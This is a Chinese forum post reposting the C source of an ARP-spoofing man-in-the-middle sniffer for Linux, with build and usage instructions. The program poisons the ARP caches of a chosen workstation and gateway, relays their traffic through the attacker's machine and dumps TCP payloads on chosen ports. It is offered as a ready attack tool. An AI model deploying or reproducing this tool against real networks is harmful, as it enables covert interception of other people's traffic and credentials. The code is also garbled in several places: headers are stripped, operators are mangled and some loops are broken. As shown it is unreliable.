曲径通幽论坛

标题: Arp Sniffer在linux下面的具体实现 [打印本页]

作者: beyes 时间: 2009-8-31 09:13
标题: Arp Sniffer在linux下面的具体实现
*============================================================================
Coder: Paris-ye
Released on: 1/9/2003
Test on: redhat 9.0
Information:
This is a arp spoof sniffer.
W <--- workstation
B <--- Server or GateWay
M <--- Man in the middle (agent),self IP address
Make:
first you must install "pcap" and "libnet"
gcc -I/usr/local/include -L/usr/local/lib -o sniffer sniffer.c -lpcap -lnet
Usage:
./sniffer -I [Interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
============================================================================*/
#include ;
#include ;
#include ;
#include ;
#include ;
#define MAXBUF 1024*4
#define PCAP_TOUT 5
#define PROMISC 0
#define TRUE 1
#define FALSE 0
/* Ethernet protocol ID's */
#define ETHERTYPE_PUP           0x0200          /* Xerox PUP */
#define ETHERTYPE_IP            0x0800          /* IP */
#define ETHERTYPE_ARP           0x0806          /* Address resolution */
#define ETHERTYPE_REVARP        0x8035          /* Reverse ARP */
/* This structure defines an ethernet arp header. */
/* ARP protocol opcodes. */
#define ARPOP_REQUEST   1               /* ARP request. */
#define ARPOP_REPLY     2               /* ARP reply. */
#define ARPOP_RREQUEST 3               /* RARP request. */
#define ARPOP_RREPLY    4               /* RARP reply. */
#define ARPOP_InREQUEST 8               /* InARP request. */
#define ARPOP_InREPLY   9               /* InARP reply. */
#define ARPOP_NAK       10              /* (ATM)ARP NAK. */
/* ARP protocol HARDWARE identifiers. */
#define ARPHRD_NETROM   0               /* From KA9Q: NET/ROM pseudo. */
#define ARPHRD_ETHER    1               /* Ethernet 10/100Mbps. */
#define ARPHRD_EETHER   2               /* Experimental Ethernet. */
#define ARPHRD_AX25     3               /* AX.25 Level 2. */
#define ARPHRD_PRONET   4               /* PROnet token ring. */
#define ARPHRD_CHAOS    5               /* Chaosnet. */
#define ARPHRD_IEEE802 6               /* IEEE 802.2 Ethernet/TR/TB. */
#define ARPHRD_ARCNET   7               /* ARCnet. */
#define ARPHRD_APPLETLK 8               /* APPLEtalk. */
#define ARPHRD_DLCI     15              /* Frame Relay DLCI. */
#define ARPHRD_ATM      19              /* ATM. */
#define ARPHRD_METRICOM 23              /* Metricom STRIP (new IANA id). */
/* Dummy types for non ARP hardware */
#define ARPHRD_SLIP       0x256
#define ARPHRD_CSLIP      0x257
#define ARPHRD_SLIP6      0x258
#define ARPHRD_CSLIP6     0x259
#define ARPHRD_RSRVD      0x260             /* Notional KISS type. */
#define ARPHRD_ADAPT      0x264
#define ARPHRD_ROSE       0x270
#define ARPHRD_X25        0x271             /* CCITT X.25. */
#define ARPHDR_HWX25      0x272             /* Boards with X.25 in firmware. */
#define ARPHRD_PPP        0x512
#define ARPHRD_CISCO      0x513             /* Cisco HDLC. */
#define ARPHRD_HDLC       ARPHRD_CISCO
#define ARPHRD_LAPB       0x516             /* LAPB. */
#define ARPHRD_DDCMP      0x517             /* Digital's DDCMP. */
#define ARPHRD_RAWHDLC    0x518             /* Raw HDLC. */
#define ARPHRD_TUNNEL     0x768             /* IPIP tunnel. */
#define ARPHRD_TUNNEL6    0x769             /* IPIP6 tunnel. */
#define ARPHRD_FRAD       0x770             /* Frame Relay Access Device. */
#define ARPHRD_SKIP       0x771             /* SKIP vif. */
#define ARPHRD_LOOPBACK   0x772             /* Loopback device. */
#define ARPHRD_LOCALTLK   0x773             /* Localtalk device. */
#define ARPHRD_FDDI       0x774             /* Fiber Distributed Data Interface. */
#define ARPHRD_BIF        0x775             /* AP1000 BIF. */
#define ARPHRD_SIT        0x776             /* sit0 device - IPv6-in-IPv4. */
#define ARPHRD_IPDDP      0x777             /* IP-in-DDP tunnel. */
#define ARPHRD_IPGRE      0x778             /* GRE over IP. */
#define ARPHRD_PIMREG     0x779             /* PIMSM register interface. */
#define ARPHRD_HIPPI      0x780             /* High Performance Parallel I'face. */
#define ARPHRD_ASH        0x781             /* (Nexus Electronics) Ash. */
#define ARPHRD_ECONET     0x782             /* Acorn Econet. */
#define ARPHRD_IRDA       0x783             /* Linux-IrDA. */
#define ARPHRD_FCPP       0x784             /* Point to point fibrechanel. */
#define ARPHRD_FCAL       0x785             /* Fibrechanel arbitrated loop. */
#define ARPHRD_FCPL       0x786             /* Fibrechanel public loop. */
#define ARPHRD_FCPFABRIC 0x787             /* Fibrechanel fabric. */
#define ARPHRD_IEEE802_TR 0x800             /* Magic type ident for TR. */
#define ARPHRD_IEEE80211 0x801             /* IEEE 802.11. */
/* IP version number */
#define IPVERSION       4
struct ether_header
{
u_int8_t ether_dhost[6];      /* destination eth addr */
u_int8_t ether_shost[6];      /* source ether addr    */
u_int16_t ether_type;          /* packet type ID field */
};
struct arphdr
{
unsigned short int ar_hrd;          /* Format of hardware address. */
unsigned short int ar_pro;          /* Format of protocol address. */
unsigned char ar_hln;               /* Length of hardware address. */
unsigned char ar_pln;               /* Length of protocol address. */
unsigned short int ar_op;           /* ARP opcode (command). */
unsigned char __ar_sha[6];          /* Sender hardware address. */
unsigned char __ar_sip[4];          /* Sender IP address. */
unsigned char __ar_tha[6];          /* Target hardware address. */
unsigned char __ar_tip[4];          /* Target IP address. */
};
/*
* Structure of an internet header, naked of options.
*/
struct iphead
{
unsigned int ip_hl:4;               /* header length */
unsigned int ip_v:4;                /* version */
u_int8_t ip_tos;                    /* type of service */
u_short ip_len;                     /* total length */
u_short ip_id;                      /* identification */
u_short ip_off;                     /* fragment offset field */
u_int8_t ip_ttl;                    /* time to live */
u_int8_t ip_p;                      /* protocol */
u_short ip_sum;                     /* checksum */
u_char ip_src[4], ip_dst[4];      /* source and dest address */
};
struct tcphead
{
u_int16_t th_sport;         /* source port */
u_int16_t th_dport;         /* destination port */
u_int32_t th_seq;             /* sequence number */
u_int32_t th_ack;             /* acknowledgement number */
u_int8_t th_off:4;          /* data offset */
u_int8_t th_x2:4;           /* (unused) */
u_int8_t th_flags;
#define TH_FIN        0x01
#define TH_SYN        0x02
#define TH_RST        0x04
#define TH_PUSH       0x08
#define TH_ACK        0x10
#define TH_URG        0x20
u_int16_t th_win;           /* window */
u_int16_t th_sum;           /* checksum */
u_int16_t th_urp;           /* urgent pointer */
};
/*
* W , S , M 's ip and mac address
*/
struct ipmacaddr
{
u_char ipW[4];
u_char macW[6];
u_char ipS[4];
u_char macS[6];
u_char ipM[4];
u_char macM[6];
};
int usage(char* argv)
{
printf("====================================\n");
printf("============Arp Sniffer=============\n");
printf("==========Write by Paris-Ye=========\n");
printf("===Usage: %s -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]\n", argv);
printf("===For example:\n");
printf("\t%s -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254\n",argv);
return 0;
}
/*send arp packet function*/
int arpsend(libnet_t* lnet,u_char* smac,u_char* sip,u_char* dmac,u_char* dip)
{
int ret=0;
u_char* packet;
u_long packets;
libnet_ptag_t t;
struct ether_header* ethh;
struct arphdr* arph;
packets=sizeof(struct ether_header)+sizeof(struct arphdr);
packet = malloc(packets);
ethh = (struct ether_header* ) packet;
arph = (struct arphdr* ) (packet+sizeof(struct ether_header));
memcpy(ethh->;ether_dhost,dmac,6);
memcpy(ethh->;ether_shost,smac,6);
ethh->;ether_type = htons(ETHERTYPE_ARP);
arph->;ar_hrd = htons(ARPOP_REQUEST);
arph->;ar_pro = htons(ARPHRD_IEEE802_TR);
arph->;ar_hln = 6;
arph->;ar_pln = 4;
arph->;ar_op = htons(ARPHRD_ETHER);
memcpy(arph->;__ar_sha,smac,6);
memcpy(arph->;__ar_sip,sip,4);
bzero(arph->;__ar_tha,6);
memcpy(arph->;__ar_tip,dip,4);
ret = libnet_write_link(
lnet,
packet,
packets
);
if(ret == -1)
{
return FALSE;
}
return TRUE;
}
/*Send spoof arp S And W every 6 second interval*/
void arpspoof(libnet_t* lnet,struct ipmacaddr* ipmac)
{
while(TRUE)
{
arpsend(lnet,ipmac->;macM,ipmac->;ipS,ipmac->;macW,ipmac->;ipW);
arpsend(lnet,ipmac->;macM,ipmac->;ipW,ipmac->;macS,ipmac->;ipS);
sleep(6);
}
}
/*Forward packets W--->;S or S--->;W*/
int forwarddate(libnet_t* lnet,const u_char* packet,int len,u_char* macW,u_char* macS,u_char* macM)
{
int ret=0;
const u_char* datapoint=packet;
struct ether_header* ethhdr;
struct iphead*       iph;
ethhdr = (struct ether_header*) datapoint;
if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP)
return TRUE;
if(!memcmp(ethhdr->;ether_shost,macM,6)) /*if the Source Mac is agent(M)'s come back*/
return TRUE;
if(memcmp(ethhdr->;ether_dhost,macM,6)) /*if the Source Mac Destination is't agent(M)'s come back*/
return TRUE;
if(!memcmp(ethhdr->;ether_shost,macW,6)) /*if the Source Mac is W's(Workstation)*/
{
memcpy(ethhdr->;ether_shost,macM,6);
memcpy(ethhdr->;ether_dhost,macS,6);
ret = libnet_write_link(
lnet,
(u_char*)datapoint,
len
);
}
if(!memcmp(ethhdr->;ether_shost,macS,6)) /*if the Source Mac is S S's(server)*/
{
memcpy(ethhdr->;ether_shost,macM,6);
memcpy(ethhdr->;ether_dhost,macW,6);
ret = libnet_write_link(
lnet,
(u_char*)datapoint,
len
);
}
return TRUE;
}
/*print hex date to Ascii */
void printdat(u_char* packet,int len)
{
int i=0,j=0;
u_char str[16];
for(i=0;i<=len-16;i+=16)
{
memcpy(str,packet+i,16);
fprintf(stdout,"%02x%02x%02x%02x %02x%02x%02x%02x %02x%02x%02x%02x %02x%02x%02x%02x ",
str[0],str[1],str[2],str[3],
str[4],str[5],str[6],str[7],
str[8],str[9],str[10],str[11],
str[12],str[13],str[14],str[15]
);
for(j=0;j<16;j++)
{
if(str[j] < 32 || str[j] >; 126)
str[j]='.';
}
fprintf(stdout,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",
str[0],str[1],str[2],str[3],
str[4],str[5],str[6],str[7],
str[8],str[9],str[10],str[11],
str[12],str[13],str[14],str[15]
);
}
if(i!=len)
{
memcpy(str,packet+i,16);
for(j=0;j<16;j++)
{
if(j%4==0 && j!=0)
fprintf(stdout," ");
if((i+j){
fprintf(stdout,"%02x",str[j]);
}
else
fprintf(stdout," ");
}
fprintf(stdout," ");
for(j=0;j<16;j++)
{
if((i+j){
if(str[j] < 32 || str[j] >; 126)
str[j]='.';
fprintf(stdout,"%c",str[j]);
}
}
fprintf(stdout,"\n\n");
}
}
/*parse packet*/
int parsedate(const u_char* packet,int len,u_char* macW,u_char* macS,u_char* macM,u_char* ipW,u_char* ipS,int* port)
{
int i=0;
int     contents;
u_char* content;
const u_char* datapoint=packet;
struct ether_header* ethhdr;
struct iphead*       iph;
struct tcphead*      tcph;
ethhdr = (struct ether_header*) datapoint;
iph = (struct iphead*) (datapoint+sizeof(struct ether_header));
tcph = (struct tcphead*) (datapoint+sizeof(struct ether_header)+sizeof(struct iphead));
if(memcmp(ethhdr->;ether_shost,macW,6) && memcmp(ethhdr->;ether_shost,macS,6))
return FALSE;
if(memcmp(ethhdr->;ether_dhost,macM,6))
return FALSE;
if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP)
return FALSE;
if(iph->;ip_v != 4 || iph->;ip_hl != 5)
return FALSE;
if(!(!memcmp(iph->;ip_dst,ipW,4) || !memcmp(iph->;ip_src,ipW,4)))
return FALSE;
if(iph->;ip_p != IPPROTO_TCP)
return FALSE;
contents = htons(iph->;ip_len)-sizeof(struct iphead)-sizeof(struct tcphead);
content = (u_char *)(datapoint+sizeof(struct ether_header)+sizeof(struct iphead)+sizeof(struct tcphead));
if((tcph->;th_flags & TH_PUSH))
{
for(i==0;port!=0;i++)
{
printf("=====%d %d\n",port,htons(tcph->;th_dport));
if(port==htons(tcph->;th_dport) || port==htons(tcph->;th_sport))
break;
}
if(port==0)
return;
printf("Size:[%d] [%d.%d.%d.%d:%d]->;[%d.%d.%d.%d:%d]\n",htons(iph->;ip_len),
iph->;ip_src[0],iph->;ip_src[1],iph->;ip_src[2],iph->;ip_src[3],htons(tcph->;th_sport),
iph->;ip_dst[0],iph->;ip_dst[1],iph->;ip_dst[2],iph->;ip_dst[3],htons(tcph->;th_dport)
);
printdat(content,contents);
}
return TRUE;
}
/*Sniffer packets*/
int agentpacket(libnet_t* lnet,pcap_t* lpcap,struct ipmacaddr* ipmac,int* port)
{
const u_char* packet;
struct pcap_pkthdr hdr;
while(1)
{
packet=pcap_next(lpcap,&hdr);
if(packet==NULL || hdr.len==0)
continue;
parsedate(packet,hdr.len,ipmac->;macW,ipmac->;macS,ipmac->;macM,ipmac->;ipW,ipmac->;ipS,port);
forwarddate(lnet,packet,hdr.len,ipmac->;macW,ipmac->;macS,ipmac->;macM);
}
return TRUE;
}
/*
When initialize Get the S and W Mac address
Send arp request
*/
int gettargetmac(libnet_t* lnet,struct ipmacaddr* ipmac)
{
while(1)
{
arpsend(lnet,ipmac->;macM,ipmac->;ipM,ipmac->;macW,ipmac->;ipW);
arpsend(lnet,ipmac->;macM,ipmac->;ipM,ipmac->;macS,ipmac->;ipS);
sleep(1);
}
return TRUE;
}
/*
When initialize Get the S and W Mac address
parse arp reply
*/
int getmacaddress(char* dev,libnet_t* lnet,pcap_t* lpcap,struct ipmacaddr* ipmac)
{
int skfd=0;
unsigned int isgetmac=0x0;
pid_t pid=0;
struct ifreq ifr;
const u_char* packet;
struct pcap_pkthdr hdr;
struct ether_header* ethhdr;
struct arphdr* arph;
//----------get local mac adrress
strcpy(ifr.ifr_name,dev);
skfd = socket(AF_INET,SOCK_DGRAM,0);
if(skfd<0)
{
printf("Can't open socket!\n");
return FALSE;
}
if(ioctl(skfd, SIOCGIFHWADDR, &ifr) < 0)
{
printf("Can't read local mac address!\n");
return FALSE;
}
memcpy(ipmac->;macM,ifr.ifr_hwaddr.sa_data,6);
close(skfd);
//----------get target mac address
pid = fork();
if(pid==0)
{
gettargetmac(lnet,ipmac);
exit(TRUE);
}
while(1)
{
packet=pcap_next(lpcap,&hdr);
if(packet==NULL || hdr.len==0)
continue;
ethhdr = (struct ether_header*) packet;
arph = (struct arphdr*) (packet+sizeof(struct ether_header));
if(memcmp(ethhdr->;ether_dhost,ipmac->;macM,6))
continue;
if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_ARP)
continue;
if(!memcmp(arph->;__ar_sip,ipmac->;ipW,4) && !memcmp(arph->;__ar_tip,ipmac->;ipM,4))
{
memcpy(ipmac->;macW,arph->;__ar_sha,6);
isgetmac=0xFFFF0000 | isgetmac;
}
if(!memcmp(arph->;__ar_sip,ipmac->;ipS,4) && !memcmp(arph->;__ar_tip,ipmac->;ipM,4))
{
memcpy(ipmac->;macS,arph->;__ar_sha,6);
isgetmac=0x0000FFFF | isgetmac;
}
if(isgetmac == 0xFFFFFFFF)
break;
}
kill(pid,9);
return TRUE;
}
int main(int argc,char* argv[])
{
int          ret=0,i=0;
char *p,*s;
char c;
char string[]="I:M:W:S:P:";
int port[100];
char dev[32]="";
struct ipmacaddr ipmac;
pid_t pid;
libnet_t* lnet;
pcap_t*     lpcap;
bpf_u_int32 netp,maskp;
struct bpf_program fp;
char        err[PCAP_ERRBUF_SIZE];
char        filterstr[]="";
unsigned int ipM;
unsigned int ipW;
unsigned int ipS;
u_char macW[] = {255,255,255,255,255,255,255};
u_char macS[] = {255,255,255,255,255,255,255};
u_char macM[] = {255,255,255,255,255,255,255};
bzero(&ipmac,sizeof(struct ipmacaddr));
if(argc<8)
{
usage(argv[0]);
return FALSE;
}
while((c = getopt(argc, argv, string)) != EOF)
{
switch(c)
{
case('I'):
strcpy(dev,optarg);
break;
case('M'):
ipM = inet_addr(optarg);
memcpy(ipmac.ipM,(void*)&ipM,4);
break;
case('W'):
ipW = inet_addr(optarg);
memcpy(ipmac.ipW,(void*)&ipW,4);
break;
case('S'):
ipS = inet_addr(optarg);
memcpy(ipmac.ipS,(void*)&ipS,4);
break;
case('P'):
printf("%s\n",optarg);
s = optarg;
p=strtok(s,":");
while(p)
{
port=atoi(p);
printf("%d\n",port);
p=strtok(NULL,":");
i++;
}
port=0;
break;
default:
usage(argv[0]);
return FALSE;
}
}
memcpy(ipmac.macW,macW,6);
memcpy(ipmac.macS,macS,6);
memcpy(ipmac.macM,macM,6);
ret = pcap_lookupnet(dev,&netp,&maskp,err);
if(ret == -1)
{
printf("Can't initialize PCAP![%s]\n",err);
return FALSE;
}
lpcap = pcap_open_live(
dev,
MAXBUF,
PROMISC,
PCAP_TOUT,
err
);
if(lpcap == NULL)
{
printf("Can't initialize PCAP![%s]\n",err);
return FALSE;
}
ret = pcap_compile(lpcap,&fp,filterstr,0,netp);
if(ret == -1)
{
printf("Error pcap_compile!\n");
return FALSE;
}
ret = pcap_setfilter(lpcap,&fp);
if(ret == -1)
{
printf("Error pcap_setfilter!\n");
return FALSE;
}
lnet = libnet_init(
LIBNET_LINK,
dev,
err);
if(lnet == NULL)
{
printf("Can't initialize libnet!Please check the [dev]\n");
return FALSE;
}
ret = getmacaddress(dev,lnet,lpcap,&ipmac);
printf("Get network cards mac address:\n");
printf("M->; %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macM[0],ipmac.macM[1],ipmac.macM[2],ipmac.macM[3],ipmac.macM[4],ipmac.macM[5],ipmac.macM[6]);
printf("W->; %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macW[0],ipmac.macW[1],ipmac.macW[2],ipmac.macW[3],ipmac.macW[4],ipmac.macW[5],ipmac.macW[6]);
printf("S->; %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macS[0],ipmac.macS[1],ipmac.macS[2],ipmac.macS[3],ipmac.macS[4],ipmac.macS[5],ipmac.macS[6]);
printf("\nNow Start... .. .\n");
if(ret == FALSE)
{
return FALSE;
}
pid = fork();
if(pid==0)
{
arpspoof(lnet,&ipmac);
return FALSE;
}else
{
agentpacket(lnet,lpcap,&ipmac,port);
}
libnet_destroy(lnet);
pcap_close(lpcap);
printf("Done\n");
return TRUE;
}

欢迎光临曲径通幽论坛 (http://www.groad.net/bbs/)